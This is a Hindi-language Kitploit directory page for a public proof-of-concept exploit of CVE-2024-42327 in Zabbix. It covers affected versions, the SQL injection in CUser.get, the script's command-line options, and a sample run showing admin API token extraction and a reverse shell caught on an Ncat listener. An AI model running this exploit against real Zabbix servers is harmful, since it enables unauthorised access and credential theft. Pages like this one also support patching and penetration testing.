Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-42327 — CVE-2024-42327 के लिए POC: Zabbix विशेषाधिकार वृद्धि -> RCE | Kitploit
उपकरण/GitHubGitHub/godylockz/cve-2024-42327
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubgodylockz/cve-2024-42327

CVE-2024-42327

CVE-2024-42327 के लिए POC: Zabbix विशेषाधिकार वृद्धि -> RCE

रिपॉजिटरी देखें
9241 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-42327: Zabbix विशेषाधिकार वृद्धि -> RCE

विवरण

यह प्रूफ-ऑफ-कॉन्सेप्ट (POC) CVE-2024-42327 का शोषण करके एडमिन API प्रमाणीकरण टोकन लीक करने और Zabbix सर्वर < 6.0.32rc1, 6.4.17rc1, 7.0.1rc1 पर रिवर्स शेल प्राप्त करने के लिए एक आइटम बनाने के लिए उपयोग किया जा सकता है।

Zabbix फ्रंटएंड पर डिफ़ॉल्ट User भूमिका वाला या API पहुंच देने वाली किसी अन्य भूमिका वाला एक गैर-एडमिन उपयोगकर्ता खाता इस भेद्यता का शोषण कर सकता है। CUser वर्ग में addRelatedObjects फ़ंक्शन में SQLi मौजूद है, यह फ़ंक्शन CUser.get फ़ंक्शन से कॉल किया जाता है जो API पहुंच वाले प्रत्येक उपयोगकर्ता के लिए उपलब्ध है।

गंभीरता: 9.9 CRITICAL Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

उपयोग

root@kitploit:~
usage: zabbix_privesc.py [-h] -t URL -u USERNAME -p PASSWORD [--listen-ip LISTEN_IP] [--listen-port LISTEN_PORT] [--threads THREADS] [--sleep-time SLEEP_TIME]
                         [--row ROW] [--length LENGTH] [-a USERAGENT] [-x PROXY] [-v]

POC for CVE-2024-42327 (Zabbix admin API token leak)

options:
  -h, --help            यह सहायता संदेश दिखाएं और बाहर निकलें
  -t, --url URL         Zabbix लक्ष्य URL
  -u, --username USERNAME
                        Zabbix उपयोगकर्ता नाम
  -p, --password PASSWORD
                        Zabbix पासवर्ड
  --listen-ip LISTEN_IP
                        सुनने वाला IP / इंटरफ़ेस
  --listen-port LISTEN_PORT
                        सुनने वाला पोर्ट
  --threads THREADS     थ्रेड्स
  --sleep-time SLEEP_TIME
                        नींद का समय
  --row ROW             पंक्ति सूचकांक
  --length LENGTH       अधिकतम लंबाई
  -a, --useragent USERAGENT
                        अनुरोध भेजते समय उपयोग करने के लिए User agent
  -x, --proxy PROXY     अनुरोध भेजते समय उपयोग करने के लिए HTTP(s) प्रॉक्सी (जैसे -p http://127.0.0.1:8080)
  -v, --verbose         वर्बोसिटी सक्षम - अतिरिक्त आउटपुट फ्लैग

उदाहरण

root@kitploit:~
python3 zabbix_privesc.py -t https://TARGET/zabbix/ -u USER -p PASSWORD
[*] प्रमाणीकरण कर रहा है ...
[+] लॉगिन सफल! USER API auth token: d0a05dfe4ce768f62e22bda4057c7c19
[*] डेटा निष्कर्षण शुरू कर रहा है ...
[*] एडमिन API auth token निकाल रहा है: af186c156b27a0c3f688b43f58c911c9
[*] होस्ट ID प्राप्त कर रहा है ...
[*] host.get response: {'jsonrpc': '2.0', 'result': [{'hostid': '10084', 'host': 'Zabbix server', 'interfaces': [{'interfaceid': '1'}]}], 'id': 1}
[*] लिसनर शुरू कर रहा है और रिवर्स शेल भेज रहा है ...
Ncat: सुन रहा है 0.0.0.0:4444
Ncat: कनेक्शन X.X.X.X:51004 से।
zabbix@target:/$ id
uid=114(zabbix) gid=121(zabbix) groups=121(zabbix)

संदर्भ

  • Zabbix समर्थन
  • NIST CVE-2024-42327
टूल डाउनलोड करें